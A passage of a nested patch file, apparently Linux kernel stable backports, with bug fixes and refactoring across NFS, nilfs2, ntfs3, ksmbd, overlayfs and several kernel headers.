++			ctx->nfs_server.addrlen = sizeof(data->addr);
++			ctx->nfs_server.port = ntohs(data->addr.sin_port);
++		}
++
+ 		if (sap->ss_family != AF_INET ||
+ 		    !nfs_verify_server_address(sap))
+ 			goto out_no_address;
+diff --git a/fs/nfs/nfs4state.c b/fs/nfs/nfs4state.c
+index 457b2b2f804ab..2b19ddc2c39ad 100644
+--- a/fs/nfs/nfs4state.c
++++ b/fs/nfs/nfs4state.c
+@@ -2113,6 +2113,7 @@ static int nfs4_try_migration(struct nfs_server *server, const struct cred *cred
+ {
+ 	struct nfs_client *clp = server->nfs_client;
+ 	struct nfs4_fs_locations *locations = NULL;
++	struct nfs_fattr *fattr;
+ 	struct inode *inode;
+ 	struct page *page;
+ 	int status, result;
+@@ -2122,19 +2123,16 @@ static int nfs4_try_migration(struct nfs_server *server, const struct cred *cred
+ 			(unsigned long long)server->fsid.minor,
+ 			clp->cl_hostname);
+ 
+-	result = 0;
+ 	page = alloc_page(GFP_KERNEL);
+ 	locations = kmalloc(sizeof(struct nfs4_fs_locations), GFP_KERNEL);
+-	if (page == NULL || locations == NULL) {
+-		dprintk("<-- %s: no memory\n", __func__);
+-		goto out;
+-	}
+-	locations->fattr = nfs_alloc_fattr();
+-	if (locations->fattr == NULL) {
++	fattr = nfs_alloc_fattr();
++	if (page == NULL || locations == NULL || fattr == NULL) {
+ 		dprintk("<-- %s: no memory\n", __func__);
++		result = 0;
+ 		goto out;
+ 	}
+ 
++	locations->fattr = fattr;
+ 	inode = d_inode(server->super->s_root);
+ 	result = nfs4_proc_get_locations(server, NFS_FH(inode), locations,
+ 					 page, cred);
+diff --git a/fs/nilfs2/ioctl.c b/fs/nilfs2/ioctl.c
+index ef9f9a2511b72..1d4d610bd82b5 100644
+--- a/fs/nilfs2/ioctl.c
++++ b/fs/nilfs2/ioctl.c
+@@ -60,7 +60,7 @@ static int nilfs_ioctl_wrap_copy(struct the_nilfs *nilfs,
+ 	if (argv->v_nmembs == 0)
+ 		return 0;
+ 
+-	if (argv->v_size > PAGE_SIZE)
++	if ((size_t)argv->v_size > PAGE_SIZE)
+ 		return -EINVAL;
+ 
+ 	/*
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 0a84613960dbf..006df4eac9fab 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -2207,19 +2207,36 @@ static int nilfs_segctor_sync(struct nilfs_sc_info *sci)
+ 	struct nilfs_segctor_wait_request wait_req;
+ 	int err = 0;
+ 
+-	spin_lock(&sci->sc_state_lock);
+ 	init_wait(&wait_req.wq);
+ 	wait_req.err = 0;
+ 	atomic_set(&wait_req.done, 0);
++	init_waitqueue_entry(&wait_req.wq, current);
++
++	/*
++	 * To prevent a race issue where completion notifications from the
++	 * log writer thread are missed, increment the request sequence count
++	 * "sc_seq_request" and insert a wait queue entry using the current
++	 * sequence number into the "sc_wait_request" queue at the same time
++	 * within the lock section of "sc_state_lock".
++	 */
++	spin_lock(&sci->sc_state_lock);
+ 	wait_req.seq = ++sci->sc_seq_request;
++	add_wait_queue(&sci->sc_wait_request, &wait_req.wq);
+ 	spin_unlock(&sci->sc_state_lock);
+ 
+-	init_waitqueue_entry(&wait_req.wq, current);
+-	add_wait_queue(&sci->sc_wait_request, &wait_req.wq);
+-	set_current_state(TASK_INTERRUPTIBLE);
+ 	wake_up(&sci->sc_wait_daemon);
+ 
+ 	for (;;) {
++		set_current_state(TASK_INTERRUPTIBLE);
++
++		/*
++		 * Synchronize only while the log writer thread is alive.
++		 * Leave flushing out after the log writer thread exits to
++		 * the cleanup work in nilfs_segctor_destroy().
++		 */
++		if (!sci->sc_task)
++			break;
++
+ 		if (atomic_read(&wait_req.done)) {
+ 			err = wait_req.err;
+ 			break;
+@@ -2235,7 +2252,7 @@ static int nilfs_segctor_sync(struct nilfs_sc_info *sci)
+ 	return err;
+ }
+ 
+-static void nilfs_segctor_wakeup(struct nilfs_sc_info *sci, int err)
++static void nilfs_segctor_wakeup(struct nilfs_sc_info *sci, int err, bool force)
+ {
+ 	struct nilfs_segctor_wait_request *wrq, *n;
+ 	unsigned long flags;
+@@ -2243,7 +2260,7 @@ static void nilfs_segctor_wakeup(struct nilfs_sc_info *sci, int err)
+ 	spin_lock_irqsave(&sci->sc_wait_request.lock, flags);
+ 	list_for_each_entry_safe(wrq, n, &sci->sc_wait_request.head, wq.entry) {
+ 		if (!atomic_read(&wrq->done) &&
+-		    nilfs_cnt32_ge(sci->sc_seq_done, wrq->seq)) {
++		    (force || nilfs_cnt32_ge(sci->sc_seq_done, wrq->seq))) {
+ 			wrq->err = err;
+ 			atomic_set(&wrq->done, 1);
+ 		}
+@@ -2381,7 +2398,7 @@ static void nilfs_segctor_notify(struct nilfs_sc_info *sci, int mode, int err)
+ 	if (mode == SC_LSEG_SR) {
+ 		sci->sc_state &= ~NILFS_SEGCTOR_COMMIT;
+ 		sci->sc_seq_done = sci->sc_seq_accepted;
+-		nilfs_segctor_wakeup(sci, err);
++		nilfs_segctor_wakeup(sci, err, false);
+ 		sci->sc_flush_request = 0;
+ 	} else {
+ 		if (mode == SC_FLUSH_FILE)
+@@ -2763,6 +2780,13 @@ static void nilfs_segctor_destroy(struct nilfs_sc_info *sci)
+ 		|| sci->sc_seq_request != sci->sc_seq_done);
+ 	spin_unlock(&sci->sc_state_lock);
+ 
++	/*
++	 * Forcibly wake up tasks waiting in nilfs_segctor_sync(), which can
++	 * be called from delayed iput() via nilfs_evict_inode() and can race
++	 * with the above log writer thread termination.
++	 */
++	nilfs_segctor_wakeup(sci, 0, true);
++
+ 	if (flush_work(&sci->sc_iput_work))
+ 		flag = true;
+ 
+diff --git a/fs/ntfs3/dir.c b/fs/ntfs3/dir.c
+index 72cdfa8727d3c..98f57d0c702eb 100644
+--- a/fs/ntfs3/dir.c
++++ b/fs/ntfs3/dir.c
+@@ -475,6 +475,7 @@ static int ntfs_readdir(struct file *file, struct dir_context *ctx)
+ 		vbo = (u64)bit << index_bits;
+ 		if (vbo >= i_size) {
+ 			ntfs_inode_err(dir, "Looks like your dir is corrupt");
++			ctx->pos = eod;
+ 			err = -EINVAL;
+ 			goto out;
+ 		}
+diff --git a/fs/ntfs3/fslog.c b/fs/ntfs3/fslog.c
+index d53ef128fa733..a2d5b2a94d854 100644
+--- a/fs/ntfs3/fslog.c
++++ b/fs/ntfs3/fslog.c
+@@ -1181,7 +1181,8 @@ static int read_log_page(struct ntfs_log *log, u32 vbo,
+ static int log_read_rst(struct ntfs_log *log, u32 l_size, bool first,
+ 			struct restart_info *info)
+ {
+-	u32 skip, vbo;
++	u32 skip;
++	u64 vbo;
+ 	struct RESTART_HDR *r_page = NULL;
+ 
+ 	/* Determine which restart area we are looking for. */
+diff --git a/fs/ntfs3/index.c b/fs/ntfs3/index.c
+index eee01db6e0cc5..730629235ffa1 100644
+--- a/fs/ntfs3/index.c
++++ b/fs/ntfs3/index.c
+@@ -1531,6 +1531,11 @@ static int indx_add_allocate(struct ntfs_index *indx, struct ntfs_inode *ni,
+ 		goto out1;
+ 	}
+ 
++	if (data_size <= le64_to_cpu(alloc->nres.data_size)) {
++		/* Reuse index. */
++		goto out;
++	}
++
+ 	/* Increase allocation. */
+ 	err = attr_set_size(ni, ATTR_ALLOC, in->name, in->name_len,
+ 			    &indx->alloc_run, data_size, &data_size, true,
+@@ -1541,6 +1546,7 @@ static int indx_add_allocate(struct ntfs_index *indx, struct ntfs_inode *ni,
+ 		goto out1;
+ 	}
+ 
++out:
+ 	*vbn = bit << indx->idx2vbn_bits;
+ 
+ 	return 0;
+diff --git a/fs/ntfs3/inode.c b/fs/ntfs3/inode.c
+index 42dd9fdaf4151..2c8c32d9fcaa1 100644
+--- a/fs/ntfs3/inode.c
++++ b/fs/ntfs3/inode.c
+@@ -37,7 +37,7 @@ static struct inode *ntfs_read_mft(struct inode *inode,
+ 	bool is_dir;
+ 	unsigned long ino = inode->i_ino;
+ 	u32 rp_fa = 0, asize, t32;
+-	u16 roff, rsize, names = 0;
++	u16 roff, rsize, names = 0, links = 0;
+ 	const struct ATTR_FILE_NAME *fname = NULL;
+ 	const struct INDEX_ROOT *root;
+ 	struct REPARSE_DATA_BUFFER rp; // 0x18 bytes
+@@ -190,11 +190,12 @@ static struct inode *ntfs_read_mft(struct inode *inode,
+ 		    rsize < SIZEOF_ATTRIBUTE_FILENAME)
+ 			goto out;
+ 
++		names += 1;
+ 		fname = Add2Ptr(attr, roff);
+ 		if (fname->type == FILE_NAME_DOS)
+ 			goto next_attr;
+ 
+-		names += 1;
++		links += 1;
+ 		if (name && name->len == fname->name_len &&
+ 		    !ntfs_cmp_names_cpu(name, (struct le_str *)&fname->name_len,
+ 					NULL, false))
+@@ -421,7 +422,7 @@ static struct inode *ntfs_read_mft(struct inode *inode,
+ 		ni->mi.dirty = true;
+ 	}
+ 
+-	set_nlink(inode, names);
++	set_nlink(inode, links);
+ 
+ 	if (S_ISDIR(mode)) {
+ 		ni->std_fa |= FILE_ATTRIBUTE_DIRECTORY;
+diff --git a/fs/ntfs3/ntfs.h b/fs/ntfs3/ntfs.h
+index ba26a465b3091..324c0b036fdc1 100644
+--- a/fs/ntfs3/ntfs.h
++++ b/fs/ntfs3/ntfs.h
+@@ -59,7 +59,7 @@ struct GUID {
+ struct cpu_str {
+ 	u8 len;
+ 	u8 unused;
+-	u16 name[10];
++	u16 name[];
+ };
+ 
+ struct le_str {
+diff --git a/fs/ntfs3/record.c b/fs/ntfs3/record.c
+index a8d4ed7bca025..1351fb02e1401 100644
+--- a/fs/ntfs3/record.c
++++ b/fs/ntfs3/record.c
+@@ -485,16 +485,9 @@ bool mi_remove_attr(struct ntfs_inode *ni, struct mft_inode *mi,
+ 	if (aoff + asize > used)
+ 		return false;
+ 
+-	if (ni && is_attr_indexed(attr)) {
++	if (ni && is_attr_indexed(attr) && attr->type == ATTR_NAME) {
+ 		u16 links = le16_to_cpu(ni->mi.mrec->hard_links);
+-		struct ATTR_FILE_NAME *fname =
+-			attr->type != ATTR_NAME ?
+-				NULL :
+-				resident_data_ex(attr,
+-						 SIZEOF_ATTRIBUTE_FILENAME);
+-		if (fname && fname->type == FILE_NAME_DOS) {
+-			/* Do not decrease links count deleting DOS name. */
+-		} else if (!links) {
++		if (!links) {
+ 			/* minor error. Not critical. */
+ 		} else {
+ 			ni->mi.mrec->hard_links = cpu_to_le16(links - 1);
+diff --git a/fs/ntfs3/super.c b/fs/ntfs3/super.c
+index 6066eea3f61cb..ab0711185b3d5 100644
+--- a/fs/ntfs3/super.c
++++ b/fs/ntfs3/super.c
+@@ -1453,8 +1453,6 @@ static int __init init_ntfs_fs(void)
+ {
+ 	int err;
+ 
+-	pr_info("ntfs3: Max link count %u\n", NTFS_LINK_MAX);
+-
+ 	if (IS_ENABLED(CONFIG_NTFS3_FS_POSIX_ACL))
+ 		pr_info("ntfs3: Enabled Linux POSIX ACLs support\n");
+ 	if (IS_ENABLED(CONFIG_NTFS3_64BIT_CLUSTER))
+diff --git a/fs/openpromfs/inode.c b/fs/openpromfs/inode.c
+index f0b7f4d51a175..0a2b0b4a8361e 100644
+--- a/fs/openpromfs/inode.c
++++ b/fs/openpromfs/inode.c
+@@ -355,10 +355,10 @@ static struct inode *openprom_iget(struct super_block *sb, ino_t ino)
+ 	return inode;
+ }
+ 
+-static int openprom_remount(struct super_block *sb, int *flags, char *data)
++static int openpromfs_reconfigure(struct fs_context *fc)
+ {
+-	sync_filesystem(sb);
+-	*flags |= SB_NOATIME;
++	sync_filesystem(fc->root->d_sb);
++	fc->sb_flags |= SB_NOATIME;
+ 	return 0;
+ }
+ 
+@@ -366,7 +366,6 @@ static const struct super_operations openprom_sops = {
+ 	.alloc_inode	= openprom_alloc_inode,
+ 	.free_inode	= openprom_free_inode,
+ 	.statfs		= simple_statfs,
+-	.remount_fs	= openprom_remount,
+ };
+ 
+ static int openprom_fill_super(struct super_block *s, struct fs_context *fc)
+@@ -416,6 +415,7 @@ static int openpromfs_get_tree(struct fs_context *fc)
+ 
+ static const struct fs_context_operations openpromfs_context_ops = {
+ 	.get_tree	= openpromfs_get_tree,
++	.reconfigure	= openpromfs_reconfigure,
+ };
+ 
+ static int openpromfs_init_fs_context(struct fs_context *fc)
+diff --git a/fs/overlayfs/dir.c b/fs/overlayfs/dir.c
+index 5339ff08bd0f4..582d4bd50a1fb 100644
+--- a/fs/overlayfs/dir.c
++++ b/fs/overlayfs/dir.c
+@@ -327,9 +327,6 @@ static int ovl_create_upper(struct dentry *dentry, struct inode *inode,
+ 	struct dentry *newdentry;
+ 	int err;
+ 
+-	if (!attr->hardlink && !IS_POSIXACL(udir))
+-		attr->mode &= ~current_umask();
+-
+ 	inode_lock_nested(udir, I_MUTEX_PARENT);
+ 	newdentry = ovl_create_real(ofs, udir,
+ 				    ovl_lookup_upper(ofs, dentry->d_name.name,
+diff --git a/fs/smb/server/mgmt/share_config.c b/fs/smb/server/mgmt/share_config.c
+index a2f0a2edceb8a..e0a6b758094fc 100644
+--- a/fs/smb/server/mgmt/share_config.c
++++ b/fs/smb/server/mgmt/share_config.c
+@@ -165,8 +165,12 @@ static struct ksmbd_share_config *share_config_request(struct unicode_map *um,
+ 
+ 		share->path = kstrndup(ksmbd_share_config_path(resp), path_len,
+ 				      GFP_KERNEL);
+-		if (share->path)
++		if (share->path) {
+ 			share->path_sz = strlen(share->path);
++			while (share->path_sz > 1 &&
++			       share->path[share->path_sz - 1] == '/')
++				share->path[--share->path_sz] = '\0';
++		}
+ 		share->create_mask = resp->create_mask;
+ 		share->directory_mask = resp->directory_mask;
+ 		share->force_create_mode = resp->force_create_mode;
+diff --git a/fs/smb/server/oplock.c b/fs/smb/server/oplock.c
+index 1b98796499d78..b29e78b517bf0 100644
+--- a/fs/smb/server/oplock.c
++++ b/fs/smb/server/oplock.c
+@@ -613,19 +613,24 @@ static int oplock_break_pending(struct oplock_info *opinfo, int req_op_level)
+ 		if (opinfo->op_state == OPLOCK_CLOSING)
+ 			return -ENOENT;
+ 		else if (opinfo->level <= req_op_level) {
+-			if (opinfo->is_lease &&
+-			    opinfo->o_lease->state !=
+-			     (SMB2_LEASE_HANDLE_CACHING_LE |
+-			      SMB2_LEASE_READ_CACHING_LE))
++			if (opinfo->is_lease == false)
++				return 1;
++
++			if (opinfo->o_lease->state !=
++			    (SMB2_LEASE_HANDLE_CACHING_LE |
++			     SMB2_LEASE_READ_CACHING_LE))
+ 				return 1;
+ 		}
+ 	}
+ 
+ 	if (opinfo->level <= req_op_level) {
+-		if (opinfo->is_lease &&
+-		    opinfo->o_lease->state !=
+-		     (SMB2_LEASE_HANDLE_CACHING_LE |
+-		      SMB2_LEASE_READ_CACHING_LE)) {
++		if (opinfo->is_lease == false) {
++			wake_up_oplock_break(opinfo);
++			return 1;
++		}
++		if (opinfo->o_lease->state !=
++		    (SMB2_LEASE_HANDLE_CACHING_LE |
++		     SMB2_LEASE_READ_CACHING_LE)) {
+ 			wake_up_oplock_break(opinfo);
+ 			return 1;
+ 		}
+diff --git a/include/drm/display/drm_dp_helper.h b/include/drm/display/drm_dp_helper.h
+index ade9df59e156a..59b191de14d61 100644
+--- a/include/drm/display/drm_dp_helper.h
++++ b/include/drm/display/drm_dp_helper.h
+@@ -436,9 +436,15 @@ struct drm_dp_aux {
+ 	 * @is_remote: Is this AUX CH actually using sideband messaging.
+ 	 */
+ 	bool is_remote;
++
++	/**
++	 * @powered_down: If true then the remote endpoint is powered down.
++	 */
++	bool powered_down;
+ };
+ 
+ int drm_dp_dpcd_probe(struct drm_dp_aux *aux, unsigned int offset);
++void drm_dp_dpcd_set_powered(struct drm_dp_aux *aux, bool powered);
+ ssize_t drm_dp_dpcd_read(struct drm_dp_aux *aux, unsigned int offset,
+ 			 void *buffer, size_t size);
+ ssize_t drm_dp_dpcd_write(struct drm_dp_aux *aux, unsigned int offset,
+diff --git a/include/drm/drm_mipi_dsi.h b/include/drm/drm_mipi_dsi.h
+index 31171914990a3..66a7e01c62608 100644
+--- a/include/drm/drm_mipi_dsi.h
++++ b/include/drm/drm_mipi_dsi.h
+@@ -244,9 +244,9 @@ int mipi_dsi_shutdown_peripheral(struct mipi_dsi_device *dsi);
+ int mipi_dsi_turn_on_peripheral(struct mipi_dsi_device *dsi);
+ int mipi_dsi_set_maximum_return_packet_size(struct mipi_dsi_device *dsi,
+ 					    u16 value);
+-ssize_t mipi_dsi_compression_mode(struct mipi_dsi_device *dsi, bool enable);
+-ssize_t mipi_dsi_picture_parameter_set(struct mipi_dsi_device *dsi,
+-				       const struct drm_dsc_picture_parameter_set *pps);
++int mipi_dsi_compression_mode(struct mipi_dsi_device *dsi, bool enable);
++int mipi_dsi_picture_parameter_set(struct mipi_dsi_device *dsi,
++				   const struct drm_dsc_picture_parameter_set *pps);
+ 
+ ssize_t mipi_dsi_generic_write(struct mipi_dsi_device *dsi, const void *payload,
+ 			       size_t size);
+diff --git a/include/linux/acpi.h b/include/linux/acpi.h
+index 3015235d65e31..e4e7b2cfe72af 100644
+--- a/include/linux/acpi.h
++++ b/include/linux/acpi.h
+@@ -582,8 +582,8 @@ acpi_status acpi_run_osc(acpi_handle handle, struct acpi_osc_context *context);
+ #define OSC_SB_PCLPI_SUPPORT			0x00000080
+ #define OSC_SB_OSLPI_SUPPORT			0x00000100
+ #define OSC_SB_CPC_DIVERSE_HIGH_SUPPORT		0x00001000
+-#define OSC_SB_GENERIC_INITIATOR_SUPPORT	0x00002000
+ #define OSC_SB_CPC_FLEXIBLE_ADR_SPACE		0x00004000
++#define OSC_SB_GENERIC_INITIATOR_SUPPORT	0x00020000
+ #define OSC_SB_NATIVE_USB4_SUPPORT		0x00040000
+ #define OSC_SB_PRM_SUPPORT			0x00200000
+ 
+diff --git a/include/linux/bitops.h b/include/linux/bitops.h
+index 2ba557e067fe6..f7f5a783da2aa 100644
+--- a/include/linux/bitops.h
++++ b/include/linux/bitops.h
+@@ -80,6 +80,7 @@ __check_bitop_pr(__test_and_set_bit);
+ __check_bitop_pr(__test_and_clear_bit);
+ __check_bitop_pr(__test_and_change_bit);
+ __check_bitop_pr(test_bit);
++__check_bitop_pr(test_bit_acquire);
+ 
+ #undef __check_bitop_pr
+ 
+diff --git a/include/linux/counter.h b/include/linux/counter.h
+index b63746637de2a..246711b76e548 100644
+--- a/include/linux/counter.h
++++ b/include/linux/counter.h
+@@ -359,7 +359,6 @@ struct counter_ops {
+  * @num_counts:		number of Counts specified in @counts
+  * @ext:		optional array of Counter device extensions
+  * @num_ext:		number of Counter device extensions specified in @ext
+- * @priv:		optional private data supplied by driver
+  * @dev:		internal device structure
+  * @chrdev:		internal character device structure
+  * @events_list:	list of current watching Counter events
+diff --git a/include/linux/dev_printk.h b/include/linux/dev_printk.h
+index 8904063d4c9f0..65eec5be8ccb9 100644
+--- a/include/linux/dev_printk.h
++++ b/include/linux/dev_printk.h
+@@ -129,6 +129,16 @@ void _dev_info(const struct device *dev, const char *fmt, ...)
+ 		_dev_printk(level, dev, fmt, ##__VA_ARGS__);		\
+ 	})
+ 
++/*
++ * Dummy dev_printk for disabled debugging statements to use whilst maintaining
++ * gcc's format checking.
++ */
++#define dev_no_printk(level, dev, fmt, ...)				\
++	({								\
++		if (0)							\
++			_dev_printk(level, dev, fmt, ##__VA_ARGS__);	\
++	})
++
+ /*
+  * #defines for all the dev_<level> macros to prefix with whatever
+  * possible use of #define dev_fmt(fmt) ...
+@@ -158,10 +168,7 @@ void _dev_info(const struct device *dev, const char *fmt, ...)
+ 	dev_printk(KERN_DEBUG, dev, dev_fmt(fmt), ##__VA_ARGS__)
+ #else
+ #define dev_dbg(dev, fmt, ...)						\
+-({									\
+-	if (0)								\
+-		dev_printk(KERN_DEBUG, dev, dev_fmt(fmt), ##__VA_ARGS__); \
+-})
++	dev_no_printk(KERN_DEBUG, dev, dev_fmt(fmt), ##__VA_ARGS__)
+ #endif
+ 
+ #ifdef CONFIG_PRINTK
+@@ -247,20 +254,14 @@ do {									\
+ } while (0)
+ #else
+ #define dev_dbg_ratelimited(dev, fmt, ...)				\
+-do {									\
+-	if (0)								\
+-		dev_printk(KERN_DEBUG, dev, dev_fmt(fmt), ##__VA_ARGS__); \
+-} while (0)
++	dev_no_printk(KERN_DEBUG, dev, dev_fmt(fmt), ##__VA_ARGS__)
+ #endif
+ 
+ #ifdef VERBOSE_DEBUG
+ #define dev_vdbg	dev_dbg
+ #else
+ #define dev_vdbg(dev, fmt, ...)						\
+-({									\
+-	if (0)								\
+-		dev_printk(KERN_DEBUG, dev, dev_fmt(fmt), ##__VA_ARGS__); \
+-})
++	dev_no_printk(KERN_DEBUG, dev, dev_fmt(fmt), ##__VA_ARGS__)
+ #endif
+ 
+ /*
+diff --git a/include/linux/fpga/fpga-region.h b/include/linux/fpga/fpga-region.h
+index 9d4d32909340a..5fbc05fe70a6b 100644
+--- a/include/linux/fpga/fpga-region.h
++++ b/include/linux/fpga/fpga-region.h
+@@ -36,6 +36,7 @@ struct fpga_region_info {
+  * @mgr: FPGA manager
+  * @info: FPGA image info
+  * @compat_id: FPGA region id for compatibility check.
++ * @ops_owner: module containing the get_bridges function
+  * @priv: private data
+  * @get_bridges: optional function to get bridges to a list
+  */
+@@ -46,6 +47,7 @@ struct fpga_region {
+ 	struct fpga_manager *mgr;
+ 	struct fpga_image_info *info;
+ 	struct fpga_compat_id *compat_id;
++	struct module *ops_owner;
+ 	void *priv;
+ 	int (*get_bridges)(struct fpga_region *region);
+ };
+@@ -58,12 +60,17 @@ fpga_region_class_find(struct device *start, const void *data,
+ 
+ int fpga_region_program_fpga(struct fpga_region *region);
+ 
++#define fpga_region_register_full(parent, info) \
++	__fpga_region_register_full(parent, info, THIS_MODULE)
+ struct fpga_region *
+-fpga_region_register_full(struct device *parent, const struct fpga_region_info *info);
++__fpga_region_register_full(struct device *parent, const struct fpga_region_info *info,
++			    struct module *owner);
+ 
++#define fpga_region_register(parent, mgr, get_bridges) \
++	__fpga_region_register(parent, mgr, get_bridges, THIS_MODULE)
+ struct fpga_region *
+-fpga_region_register(struct device *parent, struct fpga_manager *mgr,
+-		     int (*get_bridges)(struct fpga_region *));
++__fpga_region_register(struct device *parent, struct fpga_manager *mgr,
++		       int (*get_bridges)(struct fpga_region *), struct module *owner);
+ void fpga_region_unregister(struct fpga_region *region);
+ 
+ #endif /* _FPGA_REGION_H */
+diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h
+index 93ec34a94b724..1cae12185cf04 100644
+--- a/include/linux/mlx5/driver.h
++++ b/include/linux/mlx5/driver.h
+@@ -850,6 +850,7 @@ struct mlx5_cmd_work_ent {
+ 	void		       *context;
+ 	int			idx;
+ 	struct completion	handling;
++	struct completion	slotted;
+ 	struct completion	done;
+ 	struct mlx5_cmd        *cmd;
+ 	struct work_struct	work;
+diff --git a/include/linux/numa.h b/include/linux/numa.h
+index 0f512c0aba54b..871e7babc2886 100644
+--- a/include/linux/numa.h
++++ b/include/linux/numa.h
+@@ -1,6 +1,7 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+ #ifndef _LINUX_NUMA_H
+ #define _LINUX_NUMA_H
++#include <linux/init.h>
+ #include <linux/types.h>
+ 
+ #ifdef CONFIG_NODES_SHIFT
+@@ -22,34 +23,21 @@
+ #endif
+ 
+ #ifdef CONFIG_NUMA
+-#include <linux/printk.h>
+ #include <asm/sparsemem.h>
+ 
+ /* Generic implementation available */
+ int numa_map_to_online_node(int node);
+ 
+ #ifndef memory_add_physaddr_to_nid
+-static inline int memory_add_physaddr_to_nid(u64 start)
+-{
+-	pr_info_once("Unknown online node for memory at 0x%llx, assuming node 0\n",
+-			start);
+-	return 0;
+-}
++int memory_add_physaddr_to_nid(u64 start);
+ #endif
++
+ #ifndef phys_to_target_node
+-static inline int phys_to_target_node(u64 start)
+-{
+-	pr_info_once("Unknown target node for memory at 0x%llx, assuming node 0\n",
+-			start);
+-	return 0;
+-}
+-#endif
+-#ifndef numa_fill_memblks
+-static inline int __init numa_fill_memblks(u64 start, u64 end)
+-{
+-	return NUMA_NO_MEMBLK;
+-}
++int phys_to_target_node(u64 start);
+ #endif
++
++int numa_fill_memblks(u64 start, u64 end);
++
+ #else /* !CONFIG_NUMA */
+ static inline int numa_map_to_online_node(int node)
+ {
+diff --git a/include/linux/printk.h b/include/linux/printk.h
+index 8c81806c2e99f..b1a12916f0361 100644
+--- a/include/linux/printk.h
++++ b/include/linux/printk.h
+@@ -128,7 +128,7 @@ struct va_format {
+ #define no_printk(fmt, ...)				\
+ ({							\
+ 	if (0)						\
+-		printk(fmt, ##__VA_ARGS__);		\
++		_printk(fmt, ##__VA_ARGS__);		\
+ 	0;						\
+ })
+ 
+diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
+index cecd3b6bebb8b..2b54662048882 100644
+--- a/include/linux/skbuff.h
++++ b/include/linux/skbuff.h
+@@ -2636,15 +2636,26 @@ void *skb_pull_data(struct sk_buff *skb, size_t len);
+ 
+ void *__pskb_pull_tail(struct sk_buff *skb, int delta);
+ 
+-static inline bool pskb_may_pull(struct sk_buff *skb, unsigned int len)
++static inline enum skb_drop_reason
++pskb_may_pull_reason(struct sk_buff *skb, unsigned int len)
+ {
+ 	DEBUG_NET_WARN_ON_ONCE(len > INT_MAX);
+ 
+ 	if (likely(len <= skb_headlen(skb)))
+-		return true;
++		return SKB_NOT_DROPPED_YET;
++
+ 	if (unlikely(len > skb->len))
+-		return false;
+-	return __pskb_pull_tail(skb, len - skb_headlen(skb)) != NULL;
++		return SKB_DROP_REASON_PKT_TOO_SMALL;
++
++	if (unlikely(!__pskb_pull_tail(skb, len - skb_headlen(skb))))
++		return SKB_DROP_REASON_NOMEM;
++
++	return SKB_NOT_DROPPED_YET;
++}
++
++static inline bool pskb_may_pull(struct sk_buff *skb, unsigned int len)
++{
++	return pskb_may_pull_reason(skb, len) == SKB_NOT_DROPPED_YET;
+ }
+ 
+ static inline void *pskb_pull(struct sk_buff *skb, unsigned int len)
+diff --git a/include/media/cec.h b/include/media/cec.h
+index 9c007f83569aa..ffd17371302ca 100644
+--- a/include/media/cec.h
++++ b/include/media/cec.h
+@@ -247,6 +247,7 @@ struct cec_adapter {
+ 	u16 phys_addr;
+ 	bool needs_hpd;
+ 	bool is_enabled;
++	bool is_claiming_log_addrs;
+ 	bool is_configuring;
+ 	bool must_reconfigure;
+ 	bool is_configured;
+diff --git a/include/net/ax25.h b/include/net/ax25.h
+index f8cf3629a4193..1d55e8ee08b4f 100644
+--- a/include/net/ax25.h
++++ b/include/net/ax25.h
+@@ -216,7 +216,7 @@ typedef struct {
+ struct ctl_table;
+ 
+ typedef struct ax25_dev {
+-	struct ax25_dev		*next;
++	struct list_head	list;
+ 
+ 	struct net_device	*dev;
+ 	netdevice_tracker	dev_tracker;
+@@ -333,7 +333,6 @@ int ax25_addr_size(const ax25_digi *);
+ void ax25_digi_invert(const ax25_digi *, ax25_digi *);
+ 
+ /* ax25_dev.c */
+-extern ax25_dev *ax25_dev_list;
+ extern spinlock_t ax25_dev_lock;
+ 
+ #if IS_ENABLED(CONFIG_AX25)
+diff --git a/include/net/bluetooth/bluetooth.h b/include/net/bluetooth/bluetooth.h
+index 5aaf7d7f3c6fa..c7f1dd34ea470 100644
+--- a/include/net/bluetooth/bluetooth.h
++++ b/include/net/bluetooth/bluetooth.h
+@@ -383,6 +383,8 @@ int  bt_sock_register(int proto, const struct net_proto_family *ops);
+ void bt_sock_unregister(int proto);
+ void bt_sock_link(struct bt_sock_list *l, struct sock *s);
+ void bt_sock_unlink(struct bt_sock_list *l, struct sock *s);
++struct sock *bt_sock_alloc(struct net *net, struct socket *sock,
++			   struct proto *prot, int proto, gfp_t prio, int kern);
+ int  bt_sock_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 		     int flags);
+ int  bt_sock_stream_recvmsg(struct socket *sock, struct msghdr *msg,
+diff --git a/include/net/bluetooth/l2cap.h b/include/net/bluetooth/l2cap.h
+index 2f766e3437ce2..d46f1335cf9ac 100644
+--- a/include/net/bluetooth/l2cap.h
++++ b/include/net/bluetooth/l2cap.h
+@@ -584,6 +584,9 @@ struct l2cap_chan {
+ 	__u16		tx_credits;
+ 	__u16		rx_credits;
+ 
++	/* estimated available receive buffer space or -1 if unknown */
++	ssize_t		rx_avail;
++
+ 	__u8		tx_state;
+ 	__u8		rx_state;
+ 
+@@ -724,10 +727,15 @@ struct l2cap_user {
+ /* ----- L2CAP socket info ----- */
+ #define l2cap_pi(sk) ((struct l2cap_pinfo *) sk)
+ 
++struct l2cap_rx_busy {
++	struct list_head	list;
++	struct sk_buff		*skb;
++};
++
+ struct l2cap_pinfo {
+ 	struct bt_sock		bt;
+ 	struct l2cap_chan	*chan;
+-	struct sk_buff		*rx_busy_skb;
++	struct list_head	rx_busy;
+ };
+ 
+ enum {
+@@ -985,6 +993,7 @@ int l2cap_chan_connect(struct l2cap_chan *chan, __le16 psm, u16 cid,
+ int l2cap_chan_reconfigure(struct l2cap_chan *chan, __u16 mtu);
+ int l2cap_chan_send(struct l2cap_chan *chan, struct msghdr *msg, size_t len);
+ void l2cap_chan_busy(struct l2cap_chan *chan, int busy);
++void l2cap_chan_rx_avail(struct l2cap_chan *chan, ssize_t rx_avail);
+ int l2cap_chan_check_security(struct l2cap_chan *chan, bool initiator);
+ void l2cap_chan_set_defaults(struct l2cap_chan *chan);
+ int l2cap_ertm_init(struct l2cap_chan *chan);
+diff --git a/include/net/inet6_hashtables.h b/include/net/inet6_hashtables.h
+index 56f1286583d3c..f89320b6fee31 100644
+--- a/include/net/inet6_hashtables.h
++++ b/include/net/inet6_hashtables.h
